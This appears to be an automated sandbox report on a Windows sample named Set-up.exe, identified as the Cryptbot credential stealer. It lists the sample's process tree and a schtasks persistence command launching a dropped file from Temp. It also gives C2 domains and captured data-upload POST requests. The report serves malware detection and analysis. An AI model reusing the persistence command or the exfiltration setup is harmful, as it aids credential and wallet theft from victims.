Edit tour

Windows Analysis Report
Set-up.exe

Overview

General Information

Sample name:	Set-up.exe
Analysis ID:	1525760
MD5:	78b5c3b4fb31188ee6c024ff96ff3807
SHA1:	ec49de9a8dee4ee75a2c2e8b53cc380d6d17d702
SHA256:	10409c447cb02b22dbb4a7cfa17335bffc3ccc1e7975596de8b49f0a4045e1e0
Tags:	exeuser-aachum
Infos:

Detection

Clipboard Hijacker, Cryptbot

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Clipboard Hijacker

Yara detected Cryptbot

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Drops large PE files

Found evasive API chain (may stop execution after checking mutex)

Found many strings related to Crypto-Wallets (likely being stolen)

Found stalling execution ending in API Sleep call

Sigma detected: Suspicious Scheduled Task Creation Involving Temp Folder

Tries to harvest and steal browser information (history, passwords, etc)

Uses schtasks.exe or at.exe to add and modify task schedules

Contains capabilities to detect virtual machines

Contains functionality for read data from the clipboard

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality to read the clipboard data

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains sections with non-standard names

Queries information about the installed CPU (vendor, model number etc)

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Suspicious Schtasks From Env Var Folder

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

Set-up.exe (PID: 7444 cmdline: "C:\Users\user\Desktop\Set-up.exe" MD5: 78B5C3B4FB31188EE6C024FF96FF3807)

service123.exe (PID: 7956 cmdline: "C:\Users\user\AppData\Local\Temp\service123.exe" MD5: D3D8BD210D50D5EB78D8C43E70738DD1)

schtasks.exe (PID: 7976 cmdline: "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 7984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

service123.exe (PID: 8056 cmdline: C:\Users\user\AppData\Local\Temp\/service123.exe MD5: D3D8BD210D50D5EB78D8C43E70738DD1)

service123.exe (PID: 7200 cmdline: C:\Users\user\AppData\Local\Temp\/service123.exe MD5: D3D8BD210D50D5EB78D8C43E70738DD1)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
CryptBot	A typical infostealer, capable of obtaining credentials for browsers, crypto currency wallets, browser cookies, credit cards, and creates screenshots of the infected system. All stolen data is bundled into a zip-file that is uploaded to the c2.	No Attribution	https://any.run/cybersecurity-blog/cryptbot-infostealer-malware-analysis/ https://asec.ahnlab.com/en/24423/ https://asec.ahnlab.com/en/26052/ https://asec.ahnlab.com/en/31683/ https://asec.ahnlab.com/en/31802/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptbot

Malware Configuration

Threatname: Cryptbot

{"C2 list": ["analforeverlovyu.top", "@sevtvx17pt.top", "sevtvx17pt.top"]}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000000.00000003.2036432764.00000000043CD000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Clipboard_Hijacker_5	Yara detected Clipboard Hijacker	Joe Security
Process Memory Space: Set-up.exe PID: 7444	JoeSecurity_Clipboard_Hijacker_5	Yara detected Clipboard Hijacker	Joe Security
Process Memory Space: Set-up.exe PID: 7444	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Set-up.exe PID: 7444	JoeSecurity_Cryptbot	Yara detected Cryptbot	Joe Security
Process Memory Space: service123.exe PID: 7956	JoeSecurity_Clipboard_Hijacker_5	Yara detected Clipboard Hijacker	Joe Security

Unpacked PEs

Source	Rule	Description	Author	Strings
5.2.service123.exe.6c290000.1.unpack	JoeSecurity_Clipboard_Hijacker_5	Yara detected Clipboard Hijacker	Joe Security

Sigma Signatures

System Summary

Sigma detected: Suspicious Scheduled Task Creation Involving Temp Folder

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f, CommandLine: "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Set-up.exe", ParentImage: C:\Users\user\Desktop\Set-up.exe, ParentProcessId: 7444, ParentProcessName: Set-up.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f, ProcessId: 7976, ProcessName: schtasks.exe

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Suricata Signatures

ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-04T14:44:24.477087+0200	2054350	1	A Network Trojan was detected	192.168.2.11	49711	185.244.181.140	80	TCP
2024-10-04T14:44:28.114921+0200	2054350	1	A Network Trojan was detected	192.168.2.11	49714	185.244.181.140	80	TCP
2024-10-04T14:44:33.277141+0200	2054350	1	A Network Trojan was detected	192.168.2.11	49717	185.244.181.140	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: Set-up.exe.7444.0.memstrmin

Malware Configuration Extractor: Cryptbot {"C2 list": ["analforeverlovyu.top", "@sevtvx17pt.top", "sevtvx17pt.top"]}

Multi AV Scanner detection for submitted file

Source: Set-up.exe

ReversingLabs: Detection: 44%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_008F15B0 _open,_exit,_write,_close,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,CryptReleaseContext,		5_2_008F15B0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C2914B0 _open,_exit,_write,_close,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,CryptReleaseContext,		5_2_6C2914B0

Source: Set-up.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED

Source: Set-up.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\Desktop\desktop.ini	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\Documents\desktop.ini	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then lea ecx, dword ptr [esp+04h]	5_2_008F81E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then sub esp, 1Ch	5_2_6C30AC70
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then sub esp, 1Ch	5_2_6C30AD20
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then sub esp, 1Ch	5_2_6C30AD20
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push edi	5_2_6C332EF0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then sub esp, 1Ch	5_2_6C2AAF80
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, 6C36F960h	5_2_6C2AE8C0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push esi	5_2_6C2BE490
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, dword ptr [ecx]	5_2_6C2BE490
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, ecx	5_2_6C3304E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, dword ptr [ecx]	5_2_6C2B04F0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push esi	5_2_6C2B0610
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, dword ptr [ecx+08h]	5_2_6C2BA720
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push esi	5_2_6C2BA790
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, dword ptr [ecx+08h]	5_2_6C2BA790
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, dword ptr [ecx]	5_2_6C2B0010
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, dword ptr [6C36D014h]	5_2_6C364110
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then sub esp, 1Ch	5_2_6C2B4203
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push ebx	5_2_6C338250
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, dword ptr [ecx]	5_2_6C2BC2C0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, dword ptr [ecx+08h]	5_2_6C2BA330
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push esi	5_2_6C2BA3A0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, dword ptr [ecx+08h]	5_2_6C2BA3A0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then sub esp, 1Ch	5_2_6C30BDF0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then sub esp, 1Ch	5_2_6C30BF50
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, dword ptr [ecx+04h]	5_2_6C2E9F90
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push ebp	5_2_6C349900
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push ebp	5_2_6C2E9910
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push ebp	5_2_6C2CB98B
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push ebp	5_2_6C2CB987
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then sub esp, 1Ch	5_2_6C30BAC0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push esi	5_2_6C307AC0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then lea eax, dword ptr [ecx+0Ch]	5_2_6C2BD424
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, 6C36DFF4h	5_2_6C303440
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then lea eax, dword ptr [ecx+08h]	5_2_6C2BD5A4
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push edi	5_2_6C3035F0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then lea eax, dword ptr [ecx+04h]	5_2_6C2BD724
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then sub esp, 1Ch	5_2_6C2BD050
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push ebx	5_2_6C327100
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push ebp	5_2_6C2BD2B4
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then sub esp, 1Ch	5_2_6C30B280
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	5_2_6C3093B0

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.11:49711 -> 185.244.181.140:80
Source: Network traffic	Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.11:49714 -> 185.244.181.140:80
Source: Network traffic	Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.11:49717 -> 185.244.181.140:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: analforeverlovyu.top
Source: Malware configuration extractor	URLs: @sevtvx17pt.top
Source: Malware configuration extractor	URLs: sevtvx17pt.top

Source: Joe Sandbox View

IP Address: 185.244.181.140 185.244.181.140

Source: Joe Sandbox View

ASN Name: BELCLOUDBG BELCLOUDBG

Source: global traffic	HTTP traffic detected: POST /v1/upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary49004594User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 412Host: sevtvx17pt.top
Source: global traffic	HTTP traffic detected: POST /v1/upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary80917368User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 90590Host: sevtvx17pt.top
Source: global traffic	HTTP traffic detected: POST /v1/upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary31689036User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 36669Host: sevtvx17pt.top

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	DNS traffic detected: DNS query: sevtvx17pt.top
Source: global traffic	DNS traffic detected: DNS query: 198.187.3.20.in-addr.arpa

Source: unknown

HTTP traffic detected: POST /v1/upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary49004594User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 412Host: sevtvx17pt.top

Source: Set-up.exe, 00000000.00000003.1580472872.00000000017D3000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1549423156.00000000017D3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://sevtvx17pt.top/
Source: Set-up.exe, 00000000.00000003.1580472872.00000000017D3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://sevtvx17pt.top/Qv
Source: Set-up.exe, 00000000.00000003.1580472872.00000000017D3000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1549539364.00000000017EC000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1549423156.00000000017E8000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1580472872.00000000017ED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://sevtvx17pt.top/v1/upload.php
Source: Set-up.exe, 00000000.00000003.1580472872.00000000017ED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://sevtvx17pt.top:80/v1/upload.phpoft
Source: Set-up.exe, 00000000.00000003.1591119251.0000000001D60000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: Set-up.exe, 00000000.00000003.1591119251.0000000001D60000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: Set-up.exe, 00000000.00000003.1591119251.0000000001D60000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: Set-up.exe, 00000000.00000003.1591119251.0000000001D60000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: Set-up.exe, 00000000.00000003.1591119251.0000000001D60000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: Set-up.exe, 00000000.00000003.1591119251.0000000001D60000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: Set-up.exe, 00000000.00000003.1591119251.0000000001D60000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: WomwWuRzvwrFDpojKxBm.dll.0.dr	String found in binary or memory: https://gcc.gnu.org/bugs/):
Source: Set-up.exe	String found in binary or memory: https://serviceupdate32.com/update
Source: Set-up.exe, 00000000.00000003.1591119251.0000000001D60000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: Set-up.exe, 00000000.00000003.1591119251.0000000001D60000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

Source: C:\Users\user\AppData\Local\Temp\service123.exe

Code function: 5_2_6C2A9B99 OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,CloseClipboard,GetClipboardSequenceNumber,

5_2_6C2A9B99

Source: C:\Users\user\AppData\Local\Temp\service123.exe

Code function: 5_2_6C2A9B99 OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,CloseClipboard,GetClipboardSequenceNumber,

5_2_6C2A9B99

System Summary

Drops large PE files

Source: C:\Users\user\Desktop\Set-up.exe

File dump: service123.exe.0.dr 314617856

Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_008F51B0	5_2_008F51B0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_008F3E20	5_2_008F3E20
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C29CD00	5_2_6C29CD00
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C29EE50	5_2_6C29EE50
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C354E80	5_2_6C354E80
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C2A0FC0	5_2_6C2A0FC0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C2E0870	5_2_6C2E0870
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C2D2A7E	5_2_6C2D2A7E
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C2D4490	5_2_6C2D4490
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C2A44F0	5_2_6C2A44F0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C2C8570	5_2_6C2C8570
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C2D0580	5_2_6C2D0580
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C2C2110	5_2_6C2C2110
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C2DFE10	5_2_6C2DFE10
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C2D1E40	5_2_6C2D1E40
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C2A5880	5_2_6C2A5880
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C2DD99E	5_2_6C2DD99E
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C2EDA20	5_2_6C2EDA20
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C2BF510	5_2_6C2BF510
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C2C96A0	5_2_6C2C96A0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C2D77D0	5_2_6C2D77D0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C293000	5_2_6C293000
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C2A70C0	5_2_6C2A70C0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C2D11BE	5_2_6C2D11BE
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C2E12C0	5_2_6C2E12C0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C2DF3C0	5_2_6C2DF3C0

Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: String function: 6C365980 appears 83 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: String function: 6C3638D0 appears 38 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: String function: 6C365A70 appears 77 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: String function: 6C363310 appears 43 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: String function: 6C35AB60 appears 49 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: String function: 6C363490 appears 45 times

Source: Set-up.exe, 00000000.00000002.2053608610.0000000001814000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: OriginalFilenameschtasks.exe.muij% vs Set-up.exe

Source: Set-up.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@8/2@2/1

Source: C:\Users\user\Desktop\Set-up.exe

File created: C:\Users\user\AppData\Local\WzGyqvNzOA

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7984:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Mutant created: \Sessions\1\BaseNamedObjects\ATatfiYADbBypHtbUUTn

Source: C:\Users\user\Desktop\Set-up.exe

File created: C:\Users\user\AppData\Local\Temp\service123.exe

Jump to behavior

Source: Set-up.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Set-up.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Set-up.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Set-up.exe, 00000000.00000003.1591537504.0000000001D4D000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: Set-up.exe

ReversingLabs: Detection: 44%

Source: unknown	Process created: C:\Users\user\Desktop\Set-up.exe "C:\Users\user\Desktop\Set-up.exe"
Source: C:\Users\user\Desktop\Set-up.exe	Process created: C:\Users\user\AppData\Local\Temp\service123.exe "C:\Users\user\AppData\Local\Temp\service123.exe"
Source: C:\Users\user\Desktop\Set-up.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\service123.exe C:\Users\user\AppData\Local\Temp\/service123.exe
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\service123.exe C:\Users\user\AppData\Local\Temp\/service123.exe
Source: C:\Users\user\Desktop\Set-up.exe	Process created: C:\Users\user\AppData\Local\Temp\service123.exe "C:\Users\user\AppData\Local\Temp\service123.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f	Jump to behavior

Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: dlnashext.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: wpdshext.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
